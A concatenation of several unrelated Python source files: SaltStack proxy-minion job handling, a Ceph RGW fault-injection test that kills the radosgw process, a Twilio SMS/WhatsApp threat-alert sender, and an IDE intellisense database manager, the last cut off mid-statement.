self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matchers = salt.loader.matchers(self.opts)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.user.get_uid(user=self.opts.get('user', None))
self.proc_dir = salt.minion.get_proc_dir(self.opts['cachedir'], uid=uid)
if self.connected and self.opts['pillar']:
# The pillar has changed due to the connection to the master.
# Reload the functions so that they can use the new pillar data.
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
if hasattr(self, 'schedule'):
self.schedule.functions = self.functions
self.schedule.returners = self.returners
if not hasattr(self, 'schedule'):
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
cleanup=[salt.minion.master_event(type='alive')],
proxy=self.proxy)
# add default scheduling jobs to the minions scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'run_on_start': True,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if (self.opts['transport'] != 'tcp' and
self.opts['master_alive_interval'] > 0):
self.schedule.add_job({
salt.minion.master_event(type='alive', master=self.opts['master']):
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
if self.opts['master_failback'] and \
'master_list' in self.opts and \
self.opts['master'] != self.opts['master_list'][0]:
self.schedule.add_job({
salt.minion.master_event(type='failback'):
{
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
}, persist=True)
else:
self.schedule.delete_job(salt.minion.master_event(type='failback'), persist=True)
else:
self.schedule.delete_job(salt.minion.master_event(type='alive', master=self.opts['master']), persist=True)
self.schedule.delete_job(salt.minion.master_event(type='failback'), persist=True)
# proxy keepalive
proxy_alive_fn = fq_proxyname+'.alive'
if (proxy_alive_fn in self.proxy
and 'status.proxy_reconnect' in self.functions
and self.opts.get('proxy_keep_alive', True)):
# if `proxy_keep_alive` is either not specified, either set to False does not retry reconnecting
self.schedule.add_job({
'__proxy_keepalive':
{
'function': 'status.proxy_reconnect',
'minutes': self.opts.get('proxy_keep_alive_interval', 1), # by default, check once per minute
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {
'proxy_name': fq_proxyname
}
}
}, persist=True)
self.schedule.enable_schedule()
else:
self.schedule.delete_job('__proxy_keepalive', persist=True)
# Sync the grains here so the proxy can communicate them to the master
self.functions['saltutil.sync_grains'](saltenv='base')
self.grains_cache = self.opts['grains']
self.ready = True
def target(cls, minion_instance, opts, data, connected):
if not minion_instance:
minion_instance = cls(opts)
minion_instance.connected = connected
if not hasattr(minion_instance, 'functions'):
# Need to load the modules so they get all the dunder variables
functions, returners, function_errors, executors = (
minion_instance._load_modules(grains=opts['grains'])
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
# Pull in the utils
minion_instance.utils = salt.loader.utils(minion_instance.opts)
# Then load the proxy module
minion_instance.proxy = salt.loader.proxy(minion_instance.opts, utils=minion_instance.utils)
# And re-load the modules so the __proxy__ variable gets injected
functions, returners, function_errors, executors = (
minion_instance._load_modules(grains=opts['grains'])
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
minion_instance.functions.pack['__proxy__'] = minion_instance.proxy
minion_instance.proxy.pack['__salt__'] = minion_instance.functions
minion_instance.proxy.pack['__ret__'] = minion_instance.returners
minion_instance.proxy.pack['__pillar__'] = minion_instance.opts['pillar']
# Reload utils as well (chicken and egg, __utils__ needs __proxy__ and __proxy__ needs __utils__
minion_instance.utils = salt.loader.utils(minion_instance.opts, proxy=minion_instance.proxy)
minion_instance.proxy.pack['__utils__'] = minion_instance.utils
# Reload all modules so all dunder variables are injected
minion_instance.proxy.reload_modules()
fq_proxyname = opts['proxy']['proxytype']
minion_instance.module_executors = minion_instance.proxy.get('{0}.module_executors'.format(fq_proxyname), lambda: [])()
proxy_init_fn = minion_instance.proxy[fq_proxyname + '.init']
proxy_init_fn(opts)
if not hasattr(minion_instance, 'serial'):
minion_instance.serial = salt.payload.Serial(opts)
if not hasattr(minion_instance, 'proc_dir'):
uid = salt.utils.user.get_uid(user=opts.get('user', None))
minion_instance.proc_dir = (
salt.minion.get_proc_dir(opts['cachedir'], uid=uid)
)
with tornado.stack_context.StackContext(minion_instance.ctx):
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
ProxyMinion._thread_multi_return(minion_instance, opts, data)
else:
ProxyMinion._thread_return(minion_instance, opts, data)
def thread_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
salt.utils.process.appendproctitle('{0}._thread_return {1}'.format(cls.__name__, data['jid']))
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID %s', sdata['pid'])
with salt.utils.files.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
executors = data.get('module_executors') or \
getattr(minion_instance, 'module_executors', []) or \
opts.get('module_executors', ['direct_call'])
allow_missing_funcs = any([
minion_instance.executors['{0}.allow_missing_func'.format(executor)](function_name)
for executor in executors
if '{0}.allow_missing_func' in minion_instance.executors
])
if function_name in minion_instance.functions or allow_missing_funcs is True:
try:
minion_blackout_violation = False
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
whitelist = minion_instance.opts['pillar'].get('minion_blackout_whitelist', [])
# this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist
if function_name != 'saltutil.refresh_pillar' and function_name not in whitelist:
minion_blackout_violation = True
# use minion_blackout_whitelist from grains if it exists
if minion_instance.opts['grains'].get('minion_blackout', False):
whitelist = minion_instance.opts['grains'].get('minion_blackout_whitelist', [])
if function_name != 'saltutil.refresh_pillar' and function_name not in whitelist:
minion_blackout_violation = True
if minion_blackout_violation:
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar or grains to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
if function_name in minion_instance.functions:
func = minion_instance.functions[function_name]
args, kwargs = salt.minion.load_args_and_kwargs(
func,
data['arg'],
data)
else:
# only run if function_name is not in minion_instance.functions and allow_missing_funcs is True
func = function_name
args, kwargs = data['arg'], data
minion_instance.functions.pack['__context__']['retcode'] = 0
if isinstance(executors, six.string_types):
executors = [executors]
elif not isinstance(executors, list) or not executors:
raise SaltInvocationError("Wrong executors specification: {0}. String or non-empty list expected".
format(executors))
if opts.get('sudo_user', '') and executors[-1] != 'sudo':
executors[-1] = 'sudo' # replace the last one with sudo
log.trace('Executors list %s', executors) # pylint: disable=no-member
for name in executors:
fname = '{0}.execute'.format(name)
if fname not in minion_instance.executors:
raise SaltInvocationError("Executor '{0}' is not available".format(name))
return_data = minion_instance.executors[fname](opts, data, func, args, kwargs)
if return_data is not None:
break
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, dict):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], six.text_type(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
retcode = minion_instance.functions.pack['__context__'].get(
'retcode',
salt.defaults.exitcodes.EX_OK
)
if retcode == salt.defaults.exitcodes.EX_OK:
# No nonzero retcode in __context__ dunder. Check if return
# is a dictionary with a "result" or "success" key.
try:
func_result = all(return_data.get(x, True)
for x in ('result', 'success'))
except Exception:
# return data is not a dict
func_result = True
if not func_result:
retcode = salt.defaults.exitcodes.EX_GENERIC
ret['retcode'] = retcode
ret['success'] = retcode == salt.defaults.exitcodes.EX_OK
except CommandNotFoundError as exc:
msg = 'Command required for \'{0}\' not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except CommandExecutionError as exc:
log.error(
'A command in \'%s\' had a problem: %s',
function_name, exc,
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR: {0}'.format(exc)
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except SaltInvocationError as exc:
log.error(
'Problem executing \'%s\': %s',
function_name, exc,
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR executing \'{0}\': {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except TypeError as exc:
msg = 'Passed invalid arguments to {0}: {1}\n{2}'.format(
function_name, exc, func.__doc__ or ''
)
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret['return'] = msg
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info_on_loglevel=True)
salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
else:
docs = minion_instance.functions['sys.doc']('{0}*'.format(function_name))
if docs:
docs[function_name] = minion_instance.functions.missing_fun_string(function_name)
ret['return'] = docs
else:
ret['return'] = minion_instance.functions.missing_fun_string(function_name)
mod_name = function_name.split('.')[0]
if mod_name in minion_instance.function_errors:
ret['return'] += ' Possible reasons: \'{0}\''.format(
minion_instance.function_errors[mod_name]
)
ret['success'] = False
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'master_id' in data:
ret['master_id'] = data['master_id']
if 'metadata' in data:
if isinstance(data['metadata'], dict):
ret['metadata'] = data['metadata']
else:
log.warning('The metadata parameter must be a dictionary. Ignoring.')
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
# Add default returners from minion config
# Should have been coverted to comma-delimited string already
if isinstance(opts.get('return'), six.string_types):
if data['ret']:
data['ret'] = ','.join((data['ret'], opts['return']))
else:
data['ret'] = opts['return']
log.debug('minion return: %s', ret)
# TODO: make a list? Seems odd to split it this late :/
if data['ret'] and isinstance(data['ret'], six.string_types):
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
returner_str = '{0}.returner'.format(returner)
if returner_str in minion_instance.returners:
minion_instance.returners[returner_str](ret)
else:
returner_err = minion_instance.returners.missing_fun_string(returner_str)
log.error(
'Returner %s could not be loaded: %s',
returner_str, returner_err
)
except Exception as exc:
log.exception(
'The return failed for job %s: %s', data['jid'], exc
)
def thread_multi_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
salt.utils.process.appendproctitle('{0}._thread_multi_return {1}'.format(cls.__name__, data['jid']))
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID %s', sdata['pid'])
with salt.utils.files.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
multifunc_ordered = opts.get('multifunc_ordered', False)
num_funcs = len(data['fun'])
if multifunc_ordered:
ret = {
'return': [None] * num_funcs,
'retcode': [None] * num_funcs,
'success': [False] * num_funcs
}
else:
ret = {
'return': {},
'retcode': {},
'success': {}
}
for ind in range(0, num_funcs):
if not multifunc_ordered:
ret['success'][data['fun'][ind]] = False
try:
minion_blackout_violation = False
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
whitelist = minion_instance.opts['pillar'].get('minion_blackout_whitelist', [])
# this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist
if data['fun'][ind] != 'saltutil.refresh_pillar' and data['fun'][ind] not in whitelist:
minion_blackout_violation = True
elif minion_instance.opts['grains'].get('minion_blackout', False):
whitelist = minion_instance.opts['grains'].get('minion_blackout_whitelist', [])
if data['fun'][ind] != 'saltutil.refresh_pillar' and data['fun'][ind] not in whitelist:
minion_blackout_violation = True
if minion_blackout_violation:
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar or grains to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = salt.minion.load_args_and_kwargs(
func,
data['arg'][ind],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
key = ind if multifunc_ordered else data['fun'][ind]
ret['return'][key] = func(*args, **kwargs)
retcode = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
if retcode == 0:
# No nonzero retcode in __context__ dunder. Check if return
# is a dictionary with a "result" or "success" key.
try:
func_result = all(ret['return'][key].get(x, True)
for x in ('result', 'success'))
except Exception:
# return data is not a dict
func_result = True
if not func_result:
retcode = 1
ret['retcode'][key] = retcode
ret['success'][key] = retcode == 0
except Exception as exc:
trb = traceback.format_exc()
log.warning('The minion function caused an exception: %s', exc)
if multifunc_ordered:
ret['return'][ind] = trb
else:
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'metadata' in data:
ret['metadata'] = data['metadata']
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job %s: %s',
data['jid'], exc
)
def handle_payload(self, payload):
if payload is not None and payload['enc'] == 'aes':
if self._target_load(payload['load']):
self._handle_decoded_payload(payload['load'])
elif self.opts['zmq_filtering']:
# In the filtering enabled case, we'd like to know when minion sees something it shouldnt
log.trace(
'Broadcast message received not for this minion, Load: %s',
payload['load']
)
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the minion currently has no need.
def handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# Ensure payload is unicode. Disregard failure to decode binary blobs.
if six.PY2:
data = salt.utils.data.decode(data, keep=True)
if 'user' in data:
log.info(
'User %s Executing command %s with jid %s',
data['user'], data['fun'], data['jid']
)
else:
log.info(
'Executing command %s with jid %s',
data['fun'], data['jid']
)
log.debug('Command details %s', data)
# Don't duplicate jobs
log.trace('Started JIDs: %s', self.jid_queue)
if self.jid_queue is not None:
if data['jid'] in self.jid_queue:
return
else:
self.jid_queue.append(data['jid'])
if len(self.jid_queue) > self.opts['minion_jid_queue_hwm']:
self.jid_queue.pop(0)
if isinstance(data['fun'], six.string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
process_count_max = self.opts.get('process_count_max')
if process_count_max > 0:
process_count = len(salt.utils.minion.running(self.opts))
while process_count >= process_count_max:
log.warning("Maximum number of processes reached while executing jid {0}, waiting...".format(data['jid']))
yield tornado.gen.sleep(10)
process_count = len(salt.utils.minion.running(self.opts))
# We stash an instance references to allow for the socket
# communication in Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
multiprocessing_enabled = self.opts.get('multiprocessing', True)
if multiprocessing_enabled:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
with default_signals(signal.SIGINT, signal.SIGTERM):
process = SignalHandlingMultiprocessingProcess(
target=self._target, args=(instance, self.opts, data, self.connected)
)
else:
process = threading.Thread(
target=self._target,
args=(instance, self.opts, data, self.connected),
name=data['jid']
)
if multiprocessing_enabled:
with default_signals(signal.SIGINT, signal.SIGTERM):
# Reset current signals before starting the process in
# order not to inherit the current signal handlers
process.start()
else:
process.start()
process.name = '{}-Job-{}'.format(process.name, data['jid'])
self.subprocess_list.add(process)
def target_load(self, load):
# Verify that the publication is valid
if 'tgt' not in load or 'jid' not in load or 'fun' not in load \
or 'arg' not in load:
return False
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
if 'tgt_type' in load:
match_func = self.matchers.get('{0}_match.match'.format(load['tgt_type']), None)
if match_func is None:
return False
if load['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = load.get('delimiter', DEFAULT_TARGET_DELIM)
if not match_func(load['tgt'], delimiter=delimiter):
return False
elif not match_func(load['tgt']):
return False
else:
if not self.matchers['glob_match.match'](load['tgt']):
return False
return True
|
test_kill_rgw_process.py
|
import os
import sys
import threading
sys.path.append(os.path.abspath(os.path.join(__file__, "../../../..")))
import argparse
import v1.lib.s3.rgw as rgw
from .initialize import PrepNFSGanesha
import time
import v1.utils.log as log
from v1.lib.s3.rgw import ObjectOps, Authenticate
from v1.utils.test_desc import AddTestInfo
from v1.lib.nfs_ganesha.manage_data import BaseDir, SubdirAndObjects
from v1.lib.process_manage import Process
from v1.lib.io_info import AddIOInfo
def test(yaml_file_path):
ganesha_test_config = {'mount_point': 'ganesha-mount',
'rgw_user_info': yaml_file_path}
verification = {'bucket': False,
'key': False}
log.info('ganesha_test_config :%s\n' % ganesha_test_config)
io_config = {'base_dir_count': 2,
'sub_dir_count': 2,
'Files': {'files_in_dir': 2, 'size': 10}}
add_io_info = AddIOInfo()
add_io_info.initialize()
log.info('io_config: %s\n' % io_config)
log.info('initiating nfs ganesha')
nfs_ganesha = PrepNFSGanesha(mount_point=ganesha_test_config['mount_point'],
yaml_fname=ganesha_test_config['rgw_user_info'])
nfs_ganesha.initialize()
log.info('authenticating rgw user')
rgw_auth = Authenticate(user_id=nfs_ganesha.user_id,
access_key=nfs_ganesha.access_key,
secret_key=nfs_ganesha.secret_key)
auth = rgw_auth.do_auth()
log.info('begin IO')
bdir = BaseDir(int(io_config['base_dir_count']), rgw_auth.json_file_upload,
ganesha_test_config['mount_point'],
auth['conn'])
bdirs = bdir.create(uname=str(rgw_auth.user_id))
subdir = SubdirAndObjects(bdirs, io_config, rgw_auth.json_file_upload, auth['conn'])
sub_dir_creation = threading.Thread(target=subdir.create) # adding this to thread
sub_dir_creation.start()
# kill RGW process
log.info('killing rgw process')
p = Process(name='radosgw')
p.find()
if p.process is None:
log.info('process not running')
else:
log.info('killing the process')
p.process.kill()
sub_dir_creation.join()
log.info('verification starts')
time.sleep(15)
bstatus = bdir.verify_s3()
log.info('bucket verification complete')
kstatus = subdir.verify_s3()
log.info('key verification complete')
verification = {}
for bs in bstatus:
if not bs['exists']:
verification['bucket'] = False
break
else:
verification['bucket'] = True
for ks in kstatus:
if not ks['exists']:
verification['key'] = False
if ks['type'] == 'file':
if not ks['md5_matched']:
verification['key'] = False
break
if not ks['size_matched']:
verification['key'] = False
break
else:
verification['key'] = True
return verification
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='NFS Ganesha Automation')
test_info = AddTestInfo('nfs ganesha basic IO test and verification on rgw')
parser.add_argument('-c', dest="config",
help='RGW Test yaml configuration')
args = parser.parse_args()
yaml_file = args.config
verified = test(yaml_file_path=yaml_file)
log.info('verified status: %s' % verified)
if not verified['bucket'] or not verified['key']:
test_info.failed_status('test failed')
exit(1)
else:
test_info.success_status('bucket and keys consistency verifed')
test_info.completed_info()
|
send.py
|
from ast import arg
import twilio_mod.env as my_environ
from twilio.rest import Client
from twilio_mod.Threat import Threat
import twilio_mod.upload_file as my_uploader
import threading
class send:
def __init__(self):
self.account_sid = my_environ.env_keys['TWILIO_ACCOUNT_SID']
self.auth_token = my_environ.env_keys['TWILIO_AUTH_TOKEN']
self.sms_num = my_environ.env_keys['SMS_NUM']
self.whatspp_num = my_environ.env_keys['WHATSAPP_NUM']
self.client = Client(self.account_sid, self.auth_token)
self.can_send_message = True
def sendMessage(self,message_text: str):
message = self.client.messages.create(
body=message_text,
from_=self.sms_num,
to='+917373025959'
)
print(message.sid)
print("SMS alert sent")
def sendWhatsApp(self,message_text: str):
message = self.client.messages.create(
body=message_text,
from_=self.whatspp_num,
to='whatsapp:+917373025959'
)
print(message.sid)
print("Whatsapp sent")
def sendAlert(self, path: str, threat = Threat('None', 0)):
if threat.level > 0 and self.can_send_message:
print("Sending alert.....")
message_text = 'Threat Detected \nType: ' + threat.type
self.smsThread = threading.Thread(target=self.sendMessage, args=(message_text,), daemon=True)
self.smsThread.start()
self.whatsAppThread = threading.Thread(target=self.sendWhatsApp, args=(path, message_text), daemon=True)
self.whatsAppThread.start()
self.can_send_message = False
def sendWhatsApp(self, path: str, message_text: str):
result = my_uploader.upload_cimage(path, 'threat')
url = result.get('url')
path_dict = [url]
message = self.client.messages.create(
body=message_text,
media_url=path_dict,
from_=self.whatspp_num,
to='whatsapp:+917373025959'
)
print(message.sid)
print("Whatsapp Alert Sent")
|
intellisence.py
|
# -*- coding: utf-8 -*-
from noval import _,GetApp
import noval.util.appdirs as appdirs
import noval.python.interpreter.interpreter as pythoninterpreter
import noval.python.interpreter.interpretermanager as interpretermanager
import subprocess
import noval.util.apputils as apputils
from noval.util import singleton
import os
import threading
import time
from noval.python.parser import config
from noval.python.parser import builtinmodule
from noval.python.parser.utils import CmpMember,py_sorted,NeedRenewDatabase
import glob
import signal
from dummy.userdb import UserDataDb
import noval.util.utils as utils
import datetime
import copy
import noval.consts as consts
from moduleloader import *
class IntellisenceDataLoader(object):
def __init__(self,data_location,_builtin_data_location,manager):
self._data_location = data_location
self.__builtin_data_location = _builtin_data_location
self.module_dicts = {}
self.import_list = []
self._builtin_module = None
self._manager = manager
def LodBuiltInData(self,interpreter):
if interpreter.IsV2():
builtin_data_path = os.path.join(self.__builtin_data_location,"2")
else:
builtin_data_path = os.path.join(self.__builtin_data_location,"3")
utils.get_logger().debug('load builtin data path:%s',builtin_data_path)
if not os.path.exists(builtin_data_path) or NeedRenewDatabase(builtin_data_path,config.DATABASE_VERSION):
utils.get_logger().debug('builtin data path:%s is not exist',builtin_data_path)
self.GenerateBuiltinData(interpreter,builtin_data_path)
self.LoadIntellisenceDirData(builtin_data_path)
def GenerateBuiltinData(self,interpreter,builtin_data_path):
script_path = os.path.join(utils.get_app_path(), "noval", "python","parser", "run_builtin.py")
cmd_list = [interpreter.Path,script_path,builtin_data_path, config.DATABASE_VERSION]
if apputils.is_windows():
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
startupinfo.wShowWindow = subprocess.SW_HIDE
else:
startupinfo = None
work_dir = os.path.join(utils.get_app_path(), "noval", "python","parser")
subprocess.Popen(cmd_list,startupinfo=startupinfo,cwd=work_dir)
def LoadIntellisenceDirData(self,data_path):
name_sets = set()
for filepath in glob.glob(os.path.join(data_path,"*" + config.MEMBERS_FILE_EXTENSION)):
filename = os.path.basename(filepath)
module_name = '.'.join(filename.split(".")[0:-1])
name_sets.add(module_name)
for name in name_sets:
d = dict(members=os.path.join(data_path,name +config.MEMBERS_FILE_EXTENSION),\
member_list=os.path.join(data_path,name +config.MEMBERLIST_FILE_EXTENSION))
self.module_dicts[name] = d
def Load(self,interpreter):
t = threading.Thread(target=self.LoadInterperterData,args=(interpreter,))
t.start()
def LoadInterperterData(self,interpreter):
utils.update_statusbar(_("Loading intellisence database"))
self.module_dicts.clear()
#should copy builtin list to import_list,otherwise it will change
#the interpreter.Builtins when load import list
self.import_list = copy.copy(interpreter.Builtins)
root_path = os.path.join(self._data_location,str(interpreter.Id))
intellisence_data_path = os.path.join(root_path,interpreter.Version)
if not os.path.exists(intellisence_data_path):
utils.update_statusbar(_("Finish load Intellisence database"))
return
self.LoadIntellisenceDirData(intellisence_data_path)
self.LodBuiltInData(interpreter)
self.LoadImportList()
self.LoadBuiltinModule(interpreter)
utils.update_statusbar(_("Finish load Intellisence database"))
def LoadImportList(self):
for key in self.module_dicts.keys():
if key.find(".") == -1:
if key not in self.import_list:
self.import_list.append(key)
self.import_list = py_sorted(self.import_list,CmpMember)
@property
def ImportList(self):
return self.import_list
def LoadBuiltinModule(self,interpreter):
utils.get_logger().debug('current interpreter builtin module name is:%s',interpreter.BuiltinModuleName)
builtin_module_loader = self._manager.GetModule(interpreter.BuiltinModuleName)
if builtin_module_loader is None:
utils.get_logger().debug("could not find builtin module %s, builtin database is not success loaded",interpreter.BuiltinModuleName)
return
data = builtin_module_loader.LoadMembers()
self._builtin_module = builtinmodule.BuiltinModule(builtin_module_loader.Name)
self._builtin_module.load(data)
@property
def BuiltinModule(self):
return self._builtin_module
@singleton.Singleton
class IntellisenceManager(object):
def __init__(self):
self.data_root_path = os.path.join(appdirs.get_user_data_path(),"intellisence")
if apputils.is_windows():
self._builtin_data_path = os.path.join(self.data_root_path,"builtins")
else:
self._builtin_data_path = os.path.join(appdirs.get_app_path(), "noval", "data","intellisence","builtins")
self.module_dicts = {}
self._loader = IntellisenceDataLoader(self.data_root_path,self._builtin_data_path,self)
self._is_running = False
self._process_obj = None
self._is_stopped = False
self.unfinish_files = {}
def Stop(self):
self.WriteUnfinishFiles()
self._is_stopped = True
@property
def IsRunning(self):
return self._is_running
def GetInterpreterDatabasePath(self,interpreter):
return os.path.join(self.data_root_path,str(interpreter.Id))
def GetInterpreterIntellisenceDataPath(self,interpreter):
return os.path.join(self.GetInterpreterDatabasePath(interpreter),interpreter.Version)
def generate_intellisence_data(self,interpreter,progress_dlg = None,load_data_end=False):
if interpreter.IsBuiltIn:
return
sys_path_list = interpreter.SysPathList
script_path = os.path.join(utils.get_app_path(), "noval", "python","parser", "run.py")
database_version = config.DATABASE_VERSION
cmd_list = [interpreter.Path,script_path,self.GetInterpreterDatabasePath(interpreter),\
database_version,str(int(GetApp().GetDebug()))]
if apputils.is_windows():
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
startupinfo.wShowWindow = subprocess.SW_HIDE
else:
startupinfo = None
work_dir = os.path.join(utils.get_app_path(), "noval", "python","parser")
self._process_obj = subprocess.Popen(cmd_list,startupinfo=startupinfo,cwd=work_dir)
interpreter.Analysing = True
utils.update_statusbar(_("Updating interpreter %s intellisence database") % interpreter.Name)
self._is_running = interpreter.Analysing
#if current interpreter is analysing,load data at end
if interpreter == interpretermanager.InterpreterManager().GetCurrentInterpreter():
load_data_end = True
self.Wait(interpreter,progress_dlg,load_data_end)
def Wait(self,interpreter,progress_dlg,load_data_end):
#设置为后台线程,防止退出程序时卡死
t = threading.Thread(target=self.WaitProcessEnd,daemon=True,args=(interpreter,progress_dlg,load_data_end))
t.start()
def WaitProcessEnd(self,interpreter,progress_dlg,load_data_end):
self._process_obj.wait()
interpreter.Analysing = False
interpreter.IsAnalysed = True
self._is_running = interpreter.Analysing
if progress_dlg != None:
progress_dlg.KeepGoing = False
progress_dlg.destroy()
if load_data_end and not self._is_stopped:
self.load_intellisence_data(interpreter)
if not self._is_stopped:
utils.update_statusbar(_("Intellisence database has been updated"))
else:
utils.get_logger().warn("smart intellisence analyse has been stopped by user")
def GetLastUpdateTime(self,database_location):
with open(os.path.join(database_location,config.UPDATE_FILE)) as f:
return f.read()
def AsyncShareUserData(self):
t = threading.Thread(target=self.ShareUserData)
t.start()
def ShareUserData(self):
if GetApp().GetDebug():
return
UserDataDb().ShareUserData()
UserDataDb().RecordStart()
def IsInterpreterNeedUpdateDatabase(self,interpreter):
update_interval_option = utils.profile_get_int("DatabaseUpdateInterval",consts.UPDATE_ONCE_STARTUP)
if update_interval_option == consts.UPDATE_ONCE_STARTUP:
return True
try:
#if could not find last update time,update database force
intellisence_data_path = self.GetInterpreterIntellisenceDataPath(interpreter)
last_update_time = self.GetLastUpdateTime(intellisence_data_path)
last_datetime = datetime.datetime.strptime(last_update_time, config.ISO_8601_DATETIME_FORMAT)
except:
utils.get_logger().exception('')
return True
now_datetime = datetime.datetime.now()
if update_interval_option == consts.UPDATE_ONCE_DAY:
return now_datetime > last_datetime + datetime.timedelta(hours=24)
elif update_interval_option == consts.UPDATE_ONCE_WEEK:
return now_datetime > last_datetime + datetime.timedelta(days=7)
elif update_interval_option == consts.UPDATE_ONCE_MONTH:
return now_datetime > last_datetime + datetime.timedelta(days=30)
elif update_interval_option == consts.NEVER_UPDATE_ONCE:
return False
def generate_default_intellisence_data(self):
current_interpreter = interpretermanager.InterpreterManager().GetCurrentInterpreter()
if current_interpreter is None:
return
self.AsyncShareUserData()
if not self.IsInterpreterNeedUpdateDatabase(current_interpreter):
utils.get_logger().info("interpreter %s is no need to update database" % current_interpreter.Name)
self.load_intellisence_data(current_interpreter)
return
utils.get_logger().info("interpreter %s is need to update database" % current_interpreter.Name)
try:
self.generate_intellisence_data(current_interpreter,load_data_end=True)
except Exception as e:
utils.get_logger().error('load interpreter name %s path %s version %s intellisence data path %s error: %s',current_interpreter.Name,\
current_interpreter.Path,current_interpreter.Version,\
